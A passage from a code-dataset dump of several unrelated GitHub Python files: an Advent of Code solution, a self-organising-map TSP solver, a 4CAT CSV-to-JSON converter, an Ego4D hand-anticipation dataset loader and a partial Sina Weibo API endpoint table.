},\n)\n","repo_name":"TheMechatronic/ROS2_Robotic_Car","sub_path":"src/my_py_pkg/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"1931178603","text":"def getMakerPos(stream):\n\tfor character in stream:\n\t\tif stream.count(character) > 1:\n\t\t\treturn False\n\treturn True\n\n\ndef searchPacket(stream, seqLen):\n\ti = 0\n\tfound = False\n\twhile i < len(stream) and not found:\n\t\tfound = getMakerPos(stream[i:seqLen+i])\n\t\tif found:\n\t\t\treturn seqLen+i\n\t\ti = i + 1\n\n\ndef puzzle1(f):\n\tstream = f.readline()\n\treturn searchPacket(stream, 4)\n\n\ndef puzzle2(f):\n\tstream = f.readline()\n\treturn searchPacket(stream, 14)\n\n\ndef main():\n\tfname = \"./day6.txt\"\n\twith open(fname) as f:\n\t\tprint(puzzle1(f))\n\t\tf.seek(0)\n\t\tprint(puzzle2(f))\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"ryanm101/adventofcode","sub_path":"2022/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36109839778","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport subprocess\nimport pickle\nfrom copy import deepcopy\nimport pandas as pd\n\n# Keeps track of the different available decay functions\nclass DecayFunctions:\n\n def __init__(self, factor):\n self.factor = factor\n return\n\n def exp(self,time):\n return np.exp(-time/self.factor)\n\n def lin(self,time):\n return 1-time/10000\n\n def __getitem__(self, item):\n return getattr(self,item)\n\n\n# Handles graph creation. Currently only for TSP\nclass GraphMaker:\n\n def __init__(self,output_dir):\n self.output_dir = output_dir\n self.plot_no = len(os.listdir(output_dir))\n\n def show_plot(self,cities_x,cities_y,som_x,som_y):\n plt.scatter(cities_x,cities_y)\n plt.scatter(som_x,som_y,color=\"RED\")\n plt.plot(som_x,som_y,color=\"GREEN\")\n plt.show()\n return\n\n def save_plot(self,cities_x,cities_y,som_x,som_y,nfactor=\"\",lrate=\"\"):\n plt.scatter(cities_x,cities_y,color=\"BLUE\")\n plt.scatter(som_x,som_y,color=\"RED\")\n plt.plot(som_x,som_y,color=\"GREEN\")\n plt.title(\"Nfactor: \"+str(nfactor)+\" lrate: \"+str(lrate))\n plt.savefig(self.output_dir+\"/plot\"+str(self.plot_no))\n plt.close()\n self.plot_no += 1\n\n return\n\n\n# Main class that represents the self organising map\nclass SOM:\n\n # Sets a directory to use for outputting files\n def get_output_dir(self,output_dir=None):\n if output_dir:\n dirno = len(os.listdir(\"output/\"))\n os.makedirs(\"output/\" + output_dir+str(dirno), exist_ok=False)\n return \"output/\"+output_dir+str(dirno)\n else:\n dirno = len(os.listdir(\"output/\"))\n os.makedirs(\"output/\"+str(dirno),exist_ok=False)\n return \"output/\"+str(dirno)\n\n # Todo initializes nodes spread randomly around the same area as the cities\n def matrix_init(self):\n x_min,x_max,y_min,y_max = self.cman.minmax()\n # x_col = np.full(self.output_size,x_max-x_min)\n # y_col = np.full(self.output_size, y_max - y_min)\n weights = np.random.random_sample((self.output_size,self.input_size))\n weights[:,0] = weights[:,0]*(x_max-x_min)+x_min\n weights[:, 1] = weights[:, 1] * (y_max - y_min) + y_min\n return weights\n \n def rand_init(self):\n weights = np.random.random_sample((self.output_size,self.input_size))\n x_min,x_max,y_min,y_max = self.cman.minmax()\n x_cen = x_min + 0.5*(x_max-x_min)\n y_cen = y_min + 0.5 * (y_max - y_min)\n x_s = (x_max-x_min)\n y_s = (y_max - y_min)\n weights = weights-0.5\n weights[:,0] = weights[:,0]*x_s+x_cen\n weights[:,1] = weights[:,1] * y_s + y_cen\n return weights\n\n def circle_init(self):\n x_min,x_max,y_min,y_max = self.cman.minmax()\n x_cen,y_cen = self.cman.center()\n nodes = self.output_size\n x_val = (x_max-x_min)/6\n y_val = (y_max-y_min)/6\n weights = []\n for x in range(nodes):\n x_ser = np.cos(x/nodes*2*np.pi)*x_val+x_cen\n y_ser = np.sin(x / nodes * 2 * np.pi) * y_val + y_cen\n weights.append([x_ser,y_ser])\n return np.array(weights)\n\n def center_init(self):\n x_cen,y_cen = self.cman.center()\n weights = np.full((self.output_size,self.input_size),0)\n weights[:,0] = weights[:,0]+x_cen\n weights[:, 1] = weights[:, 1] +y_cen\n return weights\n\n # Returns a list representing which nodes are actually on top of a city and which that are not\n def active_nodes(self):\n cities = self.cman.get_all_cases()\n active = np.full(self.output_size,0)\n for city in cities:\n results = np.square(self.weights - city)\n summarized = results.sum(1)\n winner_index = summarized.argmin()\n active[winner_index] = 1\n return active\n\n # Calculates the pathlength of the current SOM position, after removing nodes not assigned to any city\n def path_length(self,return_nodes=False):\n total_length = 0.\n weights = deepcopy(self.weights)\n nodecities = [[] for i in range(weights.shape[0])]\n cities = self.cman.get_all_cases()\n for i in range(len(cities)):\n results = np.square(self.weights - cities[i])\n summarized = results.sum(1)\n winner = summarized.argmin()\n nodecities[winner].append(cities[i])\n old_city = None\n first_city = None\n #loop through cities and add the distance between them\n for node in nodecities:\n for city in node:\n if not old_city:\n old_city = city\n first_city = city\n continue\n x = np.abs(city[0]-old_city[0])\n y = np.abs(city[1] - old_city[1])\n dist = np.sqrt(x**2+y**2)\n total_length += dist\n old_city = city\n # Add distance from first to last city\n x = np.abs(first_city[0] - old_city[0])\n y = np.abs(first_city[1] - old_city[1])\n dist = np.sqrt(x ** 2 + y ** 2)\n total_length += dist\n # Return view of which nodes were close to a city\n if return_nodes:\n active_nodes = self.active_nodes()\n for i in range(len(active_nodes)-1,-1,-1):\n if not active_nodes[i]: weights = np.delete(weights,i,0)\n return total_length,weights\n return total_length\n\n #\n # # Calculates the pathlength of the current SOM position, after removing nodes not assigned to any city\n # def path_length(self, return_nodes=False):\n # total_length = 0.\n # active_nodes = self.active_nodes()\n # weights = deepcopy(self.weights)\n # for i in range(len(active_nodes)-1,-1,-1):\n # if not active_nodes[i]: weights = np.delete(weights,i,0)\n # for i in range(1,len(weights)):\n # x = np.abs(weights[i-1][0]-weights[i][0])\n # y = np.abs(weights[i - 1][1] - weights[i][1])\n # dist = np.sqrt(x**2+y**2)\n # total_length += dist\n # if return_nodes:\n # return total_length,weights\n # return total_length\n\n def __init__(self,\n lr,\n input_size,\n output_size,\n decay_func,\n decay_half_life,\n caseman,\n n_factor,\n n_halftime,\n graph_int,\n video = False,\n output_dir = None,\n save = True,\n print_interval = 100\n\n ):\n self.lr = lr\n self.decay_half_life = DecayFunctions(decay_half_life)[decay_func]\n self.input_size = input_size\n self.output_size = output_size\n self.cman = caseman\n self.output_dir = self.get_output_dir(output_dir)\n self.graph_maker = GraphMaker(self.output_dir)\n self.n_factor = n_factor # Defines neighbourhood size. This equals approx 3 neighbours on each side\n self.updated_n_factor = self.n_factor\n self.graph_int = graph_int # Defines how often graphs are to be saved\n self.n_halftime = n_halftime\n self.video = video\n self.print_interval = print_interval\n\n self.weights = self.circle_init()\n self.updated_lr = self.lr\n self.save = save\n\n # Returns the neighbours of the node\n def neighbours(self, node_index,cutoff_lim=0.05):\n neighbours = []\n i = 1\n while True:\n distance_factor = np.exp((-i**2/(self.updated_n_factor**2)))\n if distance_factor <= cutoff_lim: break\n neighbours.append(((node_index+i)% len(self.weights), distance_factor))\n neighbours.append(((node_index-i)% len(self.weights), distance_factor))\n i += 1\n return neighbours\n\n # Adjusts the weights of the input node, depending on the learning rate and distance from winning node.\n def adjust(self, input, node_index, distance):\n diff = input-self.weights[node_index]\n self.weights[node_index] = self.weights[node_index] + diff*distance*self.updated_lr\n\n # Trains the neural network on one input event\n def train(self, input):\n results = np.square(self.weights-input)\n summarized = results.sum(1)\n winner = summarized.argmin()\n\n # Adjusts weights of winner node itself\n self.adjust(input,winner,1)\n\n # adjust weights of neighbours\n for (node,distance) in self.neighbours(winner):\n self.adjust(input,node,distance)\n\n # Executes a training session with cases\n def run(self, iterations):\n for i in range(iterations):\n # Run one training iteration\n input = self.cman.next()\n self.train(input)\n\n # Updates learning rate and neighbourhood rates before next iteration\n self.updated_lr = self.lr*self.decay_half_life(i)\n self.updated_n_factor = self.n_factor*np.exp(-i/self.n_halftime)\n\n # Generate charts\n if i%self.graph_int == 0:\n self.graph_maker.save_plot(self.cman.x,self.cman.y,self.weights[:,0],self.weights[:,1],self.updated_n_factor,self.updated_lr)\n\n if i%self.print_interval == 0 and i!=0:\n print(\"Currently on step: \" + str(i))\n\n\n # Finishing comments\n pl,used_nodes = self.path_length(return_nodes=True)\n #print(\"Path length= \" + str(pl))\n self.graph_maker.save_plot(self.cman.x, self.cman.y, used_nodes[:, 0], used_nodes[:, 1])\n\n # Makes a video of all the image files\n if self.video:\n cwd = os.getcwd()\n outputdir = os.path.join(cwd, self.output_dir)\n os.chdir(outputdir)\n os.system(\"ffmpeg -r 30 -f image2 -s 640x480 -i plot%d.png -vcodec libx264 -crf 25 -pix_fmt yuv420p _video.mp4 > /dev/null\")\n os.chdir(cwd)\n\n # Saves the SOM to a file\n if self.save:\n cwd = os.getcwd()\n outputdir = os.path.join(cwd, self.output_dir)\n os.chdir(outputdir)\n with open(\"SOM.pkl\", \"wb\") as f:\n pickle.dump(self, f)\n os.chdir(cwd)\n df = pd.DataFrame()\n #df = pd.read_csv(\"running_res.csv\")\n params = deepcopy(vars(self))\n params[\"path_length\"] = self.path_length()\n params[\"iterations\"] = iterations\n df = df.append(params, ignore_index=True)\n df.to_csv(\"running_res.csv\")\n\n return self.path_length(), self.output_dir\n\n\n\n","repo_name":"markusrk/Module3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"2867567683","text":"\"\"\"\nConvert a CSV file to JSON\n\"\"\"\nimport json\n\nfrom backend.lib.processor import BasicProcessor\n\n__author__ = \"Stijn Peeters\"\n__credits__ = [\"Stijn Peeters\"]\n__maintainer__ = \"Stijn Peeters\"\n__email__ = \"4cat@oilab.eu\"\n\nclass ConvertCSVToJSON(BasicProcessor):\n\t\"\"\"\n\tConvert a CSV file to JSON\n\t\"\"\"\n\ttype = \"convert-csv\" # job type ID\n\tcategory = \"Conversion\" # category\n\ttitle = \"Convert to JSON\" # title displayed in UI\n\tdescription = \"Change a CSV file to a JSON file\" # description displayed in UI\n\textension = \"json\" # extension of result file, used internally and in UI\n\n\t@classmethod\n\tdef is_compatible_with(cls, module=None, user=None):\n\t\t\"\"\"\n\t\tDetermine if processor is compatible with a dataset or processor\n\n\t\t:param module: Module to determine compatibility with\n\t\t\"\"\"\n\t\t\n\t\treturn module.get_extension() == \"csv\"\n\n\tdef process(self):\n\t\t\"\"\"\n\t\tThis takes a CSV file as input and writes the same data as a JSON file\n\t\t\"\"\"\n\t\tposts = 0\n\t\tself.dataset.update_status(\"Converting posts\")\n\n\t\t# we write to file per row, instead of json.dumps()ing all of it at\n\t\t# once, since else we risk having to keep a lot of data in memory,\n\t\t# and this buffers one row at most\n\t\twith self.dataset.get_results_path().open(\"w\") as output:\n\t\t\toutput.write(\"[\")\n\t\t\tfor post in self.source_dataset.iterate_items(self):\n\t\t\t\tposts += 1\n\n\t\t\t\tif posts > 1:\n\t\t\t\t\toutput.write(\",\")\n\n\t\t\t\toutput.write(json.dumps(post))\n\t\t\toutput.write(\"]\")\n\n\t\tself.dataset.update_status(\"Finished.\")\n\t\tself.dataset.finish(num_rows=posts)\n","repo_name":"digitalmethodsinitiative/4cat","sub_path":"processors/conversion/csv_to_json.py","file_name":"csv_to_json.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"33"} +{"seq_id":"35239350309","text":"#!/usr/bin/env python3\r\n# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\r\n\r\nimport os\r\nimport random\r\nimport json\r\nfrom pathlib import Path\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport torch\r\nimport torch.utils.data\r\n\r\n# from iopath.common.file_io import PathManager\r\nfrom iopath.common.file_io import g_pathmgr\r\nimport slowfast.utils.logging as logging\r\n\r\nfrom . import decoder as decoder\r\nfrom . import utils as utils\r\nfrom . import video_container as container\r\nfrom .build import DATASET_REGISTRY\r\n\r\nlogger = logging.get_logger(__name__)\r\n\r\n\r\n@DATASET_REGISTRY.register()\r\nclass Ego4dhand(torch.utils.data.Dataset):\r\n \"\"\"\r\n Ego4D video loader. Construct the ego4d video loader, then sample\r\n clips from the videos. For training and validation, a single clip is\r\n randomly sampled from every video with random cropping, scaling, and\r\n flipping. For testing, multiple clips are uniformaly sampled from every\r\n video with uniform cropping. For uniform cropping, we take the left, center,\r\n and right crop if the width is larger than height, or take top, center, and\r\n bottom crop if the height is larger than the width.\r\n \"\"\"\r\n\r\n def __init__(self, cfg, mode, num_retries=10):\r\n \"\"\"\r\n Construct the Ego4D video loader with a given csv file. The format of\r\n the csv file is:\r\n ```\r\n path_to_video_1 label_1\r\n path_to_video_2 label_2\r\n ...\r\n path_to_video_N label_N\r\n ```\r\n Args:\r\n cfg (CfgNode): configs.\r\n mode (string): Options includes `train`, `val`, or `test` mode.\r\n For the train and val mode, the data loader will take data\r\n from the train or val set, and sample one clip per video.\r\n For the test mode, the data loader will take data from test set,\r\n and sample multiple clips per video.\r\n num_retries (int): number of retries.\r\n \"\"\"\r\n # Only support train, val, and test mode.\r\n assert mode in [\r\n \"train\",\r\n \"val\",\r\n \"test\",\r\n \"trainval\",\r\n ], \"Split '{}' not supported for Ego4D Hand Anticipation\".format(mode)\r\n self.mode = mode\r\n self.cfg = cfg\r\n\r\n self._video_meta = {}\r\n self._num_retries = num_retries\r\n # For training or validation mode, one single clip is sampled from every\r\n # video. For testing, NUM_ENSEMBLE_VIEWS clips are sampled from every\r\n # video. For every clip, NUM_SPATIAL_CROPS is cropped spatially from\r\n # the frames.\r\n if self.mode in [\"train\", \"val\", \"trainval\"]:\r\n self._num_clips = 1\r\n elif self.mode in [\"test\"]:\r\n self._num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS * cfg.TEST.NUM_SPATIAL_CROPS\r\n\r\n logger.info(\"Constructing Ego4D {}...\".format(mode))\r\n self._construct_loader()\r\n\r\n def _construct_loader(self):\r\n \"\"\"\r\n Construct the video loader.\r\n \"\"\"\r\n path_to_file = os.path.join(\r\n self.cfg.DATA.PATH_TO_DATA_DIR,\r\n \"v1/annotations/fho_hands_{}.json\".format(self.mode),\r\n )\r\n assert g_pathmgr.exists(path_to_file), \"{} dir not found\".format(path_to_file)\r\n datadir = Path(self.cfg.DATA.PATH_TO_DATA_DIR)\r\n self._path_to_ant_videos = []\r\n self._pre45_clip_frames = []\r\n self._pre45_frames = []\r\n self._labels = []\r\n self._labels_masks = []\r\n self._clip_idx = []\r\n self._spatial_temporal_idx = []\r\n f = open(path_to_file)\r\n data = json.load(f)\r\n f.close()\r\n # print(self._num_clips)\r\n for clip_dict in data[\"clips\"]:\r\n video_uid = clip_dict[\"video_uid\"]\r\n if video_uid in self.cfg.DATA.DELETE:\r\n print(\r\n f\"{video_uid} is invalid video, so it will not be included in the dataset\"\r\n )\r\n continue\r\n for frame_dict in clip_dict[\"frames\"]:\r\n self._clip_idx.append(clip_dict[\"clip_id\"])\r\n clip_uid = clip_dict[\"clip_uid\"]\r\n path_to_image_frame = datadir / Path(\"v1/image_frame\") / Path(clip_uid)\r\n self._path_to_ant_videos.append(path_to_image_frame)\r\n self._pre45_clip_frames.append(frame_dict[\"pre_45\"][\"clip_frame\"])\r\n self._pre45_frames.append(frame_dict[\"pre_45\"][\"frame\"])\r\n label = []\r\n label_mask = []\r\n # placeholder for the 1x20 hand gt vector (padd zero when GT is not available)\r\n # 5 frames have the following order: pre_45, pre_40, pre_15, pre, contact\r\n # GT for each frames has the following order: left_x,left_y,right_x,right_y\r\n label = [0.0] * 20\r\n label_mask = [0.0] * 20\r\n if self.mode in [\"train\", \"val\", \"trainval\"]:\r\n for frame_type, frame_annot in frame_dict.items():\r\n if frame_type in [\r\n \"action_start_sec\",\r\n \"action_end_sec\",\r\n \"action_start_frame\",\r\n \"action_end_frame\",\r\n \"action_clip_start_sec\",\r\n \"action_clip_end_sec\",\r\n \"action_clip_start_frame\",\r\n \"action_clip_end_frame\",\r\n ]:\r\n continue\r\n if frame_type == \"pre_45\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[0] = 1.0\r\n label_mask[1] = 1.0\r\n label[0] = single_hand[\"left_hand\"][0]\r\n label[1] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[2] = 1.0\r\n label_mask[3] = 1.0\r\n label[2] = single_hand[\"right_hand\"][0]\r\n label[3] = single_hand[\"right_hand\"][1]\r\n if frame_type == \"pre_30\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[4] = 1.0\r\n label_mask[5] = 1.0\r\n label[4] = single_hand[\"left_hand\"][0]\r\n label[5] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[6] = 1.0\r\n label_mask[7] = 1.0\r\n label[6] = single_hand[\"right_hand\"][0]\r\n label[7] = single_hand[\"right_hand\"][1]\r\n if frame_type == \"pre_15\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[8] = 1.0\r\n label_mask[9] = 1.0\r\n label[8] = single_hand[\"left_hand\"][0]\r\n label[9] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[10] = 1.0\r\n label_mask[11] = 1.0\r\n label[10] = single_hand[\"right_hand\"][0]\r\n label[11] = single_hand[\"right_hand\"][1]\r\n if frame_type == \"pre_frame\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[12] = 1.0\r\n label_mask[13] = 1.0\r\n label[12] = single_hand[\"left_hand\"][0]\r\n label[13] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[14] = 1.0\r\n label_mask[15] = 1.0\r\n label[14] = single_hand[\"right_hand\"][0]\r\n label[15] = single_hand[\"right_hand\"][1]\r\n if frame_type == \"contact_frame\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[16] = 1.0\r\n label_mask[17] = 1.0\r\n label[16] = single_hand[\"left_hand\"][0]\r\n label[17] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[18] = 1.0\r\n label_mask[19] = 1.0\r\n label[18] = single_hand[\"right_hand\"][0]\r\n label[19] = single_hand[\"right_hand\"][1]\r\n self._labels.append(label)\r\n self._labels_masks.append(label_mask)\r\n logger.info(\r\n \"Constructing Ego4D dataloader (size: {})\".format(\r\n len(self._pre45_clip_frames)\r\n )\r\n )\r\n\r\n def __getitem__(self, index):\r\n \"\"\"\r\n Given the video index, return the list of frames, label, and video\r\n index if the video can be fetched and decoded successfully, otherwise\r\n repeatly find a random video that can be decoded as a replacement.\r\n Args:\r\n index (int): the video index provided by the pytorch sampler.\r\n Returns:\r\n frames (tensor): the frames of sampled from the video. The dimension\r\n is `channel` x `num frames` x `height` x `width`.\r\n label (int): the label of the current video.\r\n index (int): if the video provided by pytorch sampler can be\r\n decoded, then return the index of the video. If not, return the\r\n index of the video replacement that can be decoded.\r\n \"\"\"\r\n short_cycle_idx = None\r\n # When short cycle is used, input index is a tupple.\r\n if isinstance(index, tuple):\r\n index, short_cycle_idx = index\r\n\r\n if self.mode in [\"train\", \"val\", \"trainval\"]:\r\n # -1 indicates random sampling.\r\n spatial_sample_index = -1\r\n min_scale = self.cfg.DATA.TRAIN_JITTER_SCALES[0]\r\n max_scale = self.cfg.DATA.TRAIN_JITTER_SCALES[1]\r\n crop_size = self.cfg.DATA.TRAIN_CROP_SIZE\r\n if short_cycle_idx in [0, 1]:\r\n crop_size = int(\r\n round(\r\n self.cfg.MULTIGRID.SHORT_CYCLE_FACTORS[short_cycle_idx]\r\n * self.cfg.MULTIGRID.DEFAULT_S\r\n )\r\n )\r\n if self.cfg.MULTIGRID.DEFAULT_S > 0:\r\n # Decreasing the scale is equivalent to using a larger \"span\"\r\n # in a sampling grid.\r\n min_scale = int(\r\n round(float(min_scale) * crop_size / self.cfg.MULTIGRID.DEFAULT_S)\r\n )\r\n elif self.mode in [\"test\"]:\r\n min_scale, max_scale, crop_size = [self.cfg.DATA.TEST_CROP_SIZE] * 3\r\n # The testing is deterministic and no jitter should be performed.\r\n # min_scale, max_scale, and crop_size are expect to be the same.\r\n assert len({min_scale, max_scale, crop_size}) == 1\r\n else:\r\n raise NotImplementedError(\"Does not support {} mode\".format(self.mode))\r\n\r\n # create frame name list\r\n num_frames = self.cfg.DATA.NUM_FRAMES\r\n frame_names = list(\r\n reversed(\r\n [\r\n max(1, self._pre45_clip_frames[index] - 15 * i)\r\n for i in range(1, num_frames + 1)\r\n ]\r\n )\r\n )\r\n # load frames\r\n input_dir_rgb = self._path_to_ant_videos[index]\r\n input_dir_flow = Path(str(input_dir_rgb).replace(\"image_frame\", \"optical_flow\"))\r\n pre45_clip_frame = self._pre45_clip_frames[index]\r\n input_path_rgb = input_dir_rgb / Path(str(pre45_clip_frame).zfill(6))\r\n input_path_flow = (\r\n input_dir_flow / Path(\"npy\") / Path(str(pre45_clip_frame).zfill(6))\r\n )\r\n img = cv2.imread(str(input_path_rgb) + \".png\")\r\n h, w, _ = img.shape\r\n frames = torch.zeros(num_frames, 224, 224, 3)\r\n flows = torch.zeros(num_frames, 224, 224, 2)\r\n for i, frame in enumerate(frame_names):\r\n input_path_rgb = input_dir_rgb / Path(str(frame).zfill(6))\r\n input_path_flow = input_dir_flow / Path(\"npy\") / Path(str(frame).zfill(6))\r\n img = cv2.imread(str(input_path_rgb) + \".png\").astype(np.float32)\r\n frames[i] = torch.from_numpy(cv2.resize(img, (224, 224)))\r\n flows[i] = torch.from_numpy(\r\n np.load(str(input_path_flow) + \".npy\").astype(np.float32)\r\n )\r\n\r\n # Perform color normalization.\r\n frames = utils.tensor_normalize(frames, self.cfg.DATA.MEAN, self.cfg.DATA.STD)\r\n # T H W C -> C T H W.\r\n frames = frames.permute(3, 0, 1, 2)\r\n flows = flows.permute(3, 0, 1, 2)\r\n\r\n if self.mode in [\"train\", \"val\", \"trainval\"]:\r\n frames = utils.spatial_sampling(\r\n frames,\r\n spatial_idx=spatial_sample_index,\r\n min_scale=min_scale,\r\n max_scale=max_scale,\r\n crop_size=crop_size,\r\n random_horizontal_flip=self.cfg.DATA.RANDOM_FLIP,\r\n inverse_uniform_sampling=self.cfg.DATA.INV_UNIFORM_SAMPLE,\r\n )\r\n\r\n label = self._labels[index]\r\n label = torch.FloatTensor(label)\r\n mask = self._labels_masks[index]\r\n mask = torch.FloatTensor(mask)\r\n idx = (self._clip_idx[index], self._pre45_frames[index] - 1)\r\n meta = [str(input_dir_rgb), pre45_clip_frame, h, w, idx]\r\n if self.cfg.MODEL.TWO_STREAM:\r\n inputs = [frames, flows]\r\n elif self.cfg.MODEL.FLOW_ONLY:\r\n inputs = [flows]\r\n else:\r\n inputs = utils.pack_pathway_output(self.cfg, frames)\r\n\r\n return inputs, label, mask, index, meta\r\n\r\n def __len__(self):\r\n \"\"\"\r\n Returns:\r\n (int): the number of videos in the dataset.\r\n \"\"\"\r\n\r\n return len(self._path_to_ant_videos)\r\n","repo_name":"masashi-hatano/ego4d-fhp-challenge-2022","sub_path":"slowfast/datasets/ego4dhand.py","file_name":"ego4dhand.py","file_ext":"py","file_size_in_byte":14989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28205038147","text":"# coding=utf8\n\n_PAGE_PAGE = {\n 'key': 'page',\n 'init': 1,\n 'incr': 1,\n}\n\n\n_PAGE_CURSOR = {\n 'key': 'cursor',\n 'init': 0,\n 'incr': 'next_cursor',\n}\n\n\nAPI_INFOS = {\n 'statuses__public_timeline': {\n 'default': {'count': 200},\n 'payload': 'statuses',\n }, #获取最新的公共微博 DONE\n 'statuses__friends_timeline': {}, #获取当前登录用户及其所关注用户的最新微博\n 'statuses__home_timeline': {}, #获取当前登录用户及其所关注用户的最新微博\n 'statuses__friends_timeline__ids': {}, #获取当前登录用户及其所关注用户的最新微博的ID\n 'statuses__user_timeline':\n { 'default':\n { 'count': 200 },\n 'payload': 'statuses',\n 'page': _PAGE_PAGE,\n }, #获取用户发布的微博 DONE\n 'statuses__user_timeline__ids': {}, #获取用户发布的微博的ID\n 'statuses__repost_timeline':\n { 'default':\n { 'count': 200, },\n 'payload': 'reposts',\n 'page': _PAGE_PAGE,\n }, #返回一条原创微博的最新转发微博 DONE\n 'statuses__repost_timeline__ids': {}, #获取一条原创微博的最新转发微博的ID\n 'statuses__repost_by_me': {}, #返回用户转发的最新微博\n 'statuses__mentions':\n { 'default':\n { 'count': 200 },\n 'payload': 'statuses',\n 'page': _PAGE_PAGE,\n }, #获取@当前用户的最新微博 DONE\n 'statuses__mentions__ids': {}, #获取@当前用户的最新微博的ID\n 'statuses__bilateral_timeline': {}, #获取双向关注用户的最新微博\n 'statuses__show':\n { 'payload_type': 'dict',\n }, #根据ID获取单条微博信息 DONE\n 'statuses__querymid': {}, #通过id获取mid\n 'statuses__queryid': {}, #通过mid获取id\n 'statuses__hot__repost_daily': {}, #按天返回热门转发榜\n 'statuses__hot__repost_weekly': {}, #按周返回热门转发榜\n 'statuses__hot__comments_daily': {}, #按天返回当前用户关注人的热门微博评论榜\n 'statuses__hot__comments_weekly': {}, #按周返回热门评论榜\n 'statuses__count':\n { 'payload_type': 'dict',\n }, #批量获取指定微博的转发数评论数 DONE\n 'statuses__show_batch':\n { 'payload': 'statues',\n }, #Undocumented API DONE\n 'emotions': {}, #获取官方表情\n 'statuses__repost': {}, #转发一条微博信息\n 'statuses__destroy': {}, #删除微博信息\n 'statuses__update': {}, #发布一条微博信息\n 'statuses__upload': {}, #上传图片并发布一条微博\n 'statuses__upload_url_text': {}, #发布一条微博同时指定上传的图片或图片url\n 'comments__show':\n { 'default':\n { 'count': 50, },\n 'payload': 'comments',\n 'page': _PAGE_PAGE,\n }, #获取某条微博的评论列表 DONE\n 'comments__by_me':\n { 'default':\n { 'count': 200 },\n 'payload': 'comments',\n 'page': _PAGE_PAGE,\n }, #我发出的评论列表 DONE\n 'comments__to_me':\n { 'default':\n { 'count': 200 },\n 'payload': 'comments',\n 'page': _PAGE_PAGE,\n }, #我收到的评论列表 DONE\n 'comments__timeline': {}, #获取用户发送及收到的评论列表\n 'comments__mentions': {}, #获取@到我的评论\n 'comments__show_batch': {}, #批量获取评论内容 DONE\n 'comments__create': {}, #评论一条微博\n 'comments__destroy': {}, #删除一条评论\n 'comments__destroy_batch': {}, #批量删除评论\n 'comments__reply': {}, #回复一条评论\n 'users__show':\n { 'payload_type': 'dict',\n }, #获取用户信息 DONE\n 'users__domain_show': {}, #通过个性域名获取用户信息\n 'users__counts': {}, #批量获取用户的粉丝数、关注数、微博数 DONE\n 'friendships__friends': {}, #获取用户的关注列表\n 'friendships__friends__in_common': {}, #获取共同关注人列表\n 'friendships__friends__bilateral': {}, #获取双向关注列表\n 'friendships__friends__bilateral__ids': {}, #获取双向关注UID列表\n 'friendships__friends__ids':\n { 'default':\n { 'count': 5000},\n 'payload': 'ids',\n 'page': _PAGE_CURSOR,\n }, #获取用户关注对象UID列表\n 'friendships__followers':\n { 'default':\n { 'count': 200 },\n 'payload': 'users',\n 'page': _PAGE_CURSOR,\n }, #获取用户粉丝列表 DONE\n 'friendships__followers__ids':\n { 'default':\n {'count': 5000},\n 'payload': 'ids',\n 'page': _PAGE_CURSOR,\n }, #获取用户粉丝UID列表 DONE\n 'friendships__followers__active': {}, #获取用户优质粉丝列表\n 'friendships__friends_chain__followers': {}, #获取我的关注人中关注了指定用户的人\n 'friendships__show':\n { 'payload_type': 'dict',\n }, #获取两个用户关系的详细情况 DONE\n 'friendships__create': {}, #关注某用户\n 'friendships__destroy': {}, #取消关注某用户\n 'friendships__remark__update': {}, #更新关注人备注\n 'account__get_privacy': {}, #获取隐私设置信息\n 'account__profile__school_list': {}, #获取所有学校列表\n 'account__rate_limit_status': {}, #获取当前用户API访问频率限制\n 'account__get_uid': {}, #OAuth授权之后获取用户UID(作用相当于旧版接口的 account__verify_credentials)\n 'account__end_session': {}, #退出登录\n 'favorites': {}, #获取当前用户的收藏列表\n 'favorites__ids': {}, #获取当前用户的收藏列表的ID\n 'favorites__show': {}, #获取单条收藏信息\n 'favorites__by_tags': {}, #获取当前用户某个标签下的收藏列表\n 'favorites__tags': {}, #当前登录用户的收藏标签列表\n 'favorites__by_tags__ids': {}, #获取当前用户某个标签下的收藏列表的ID\n 'favorites__create': {}, #添加收藏\n 'favorites__destroy': {}, #删除收藏\n 'favorites__destroy_batch': {}, #批量删除收藏\n 'favorites__tags__update': {}, #更新收藏标签\n 'favorites__tags__update_batch': {}, #更新当前用户所有收藏下的指定标签\n 'favorites__tags__destroy_batch': {}, #删除当前用户所有收藏下的指定标签\n 'trends': {}, #获取某人话题\n 'trends__status':\n { 'default' :\n { 'count': 10, },\n 'payload': 'statuses',\n 'page': _PAGE_PAGE,\n }, # Used by wubin. have no offical document. DONE\n 'trends__is_follow': {}, #是否关注某话题\n 'trends__hourly': {}, #返回最近一小时内的热门话题\n 'trends__daily': {}, #返回最近一天内的热门话题\n 'trends__weekly': {}, #返回最近一周内的热门话题\n 'trends__follow': {}, 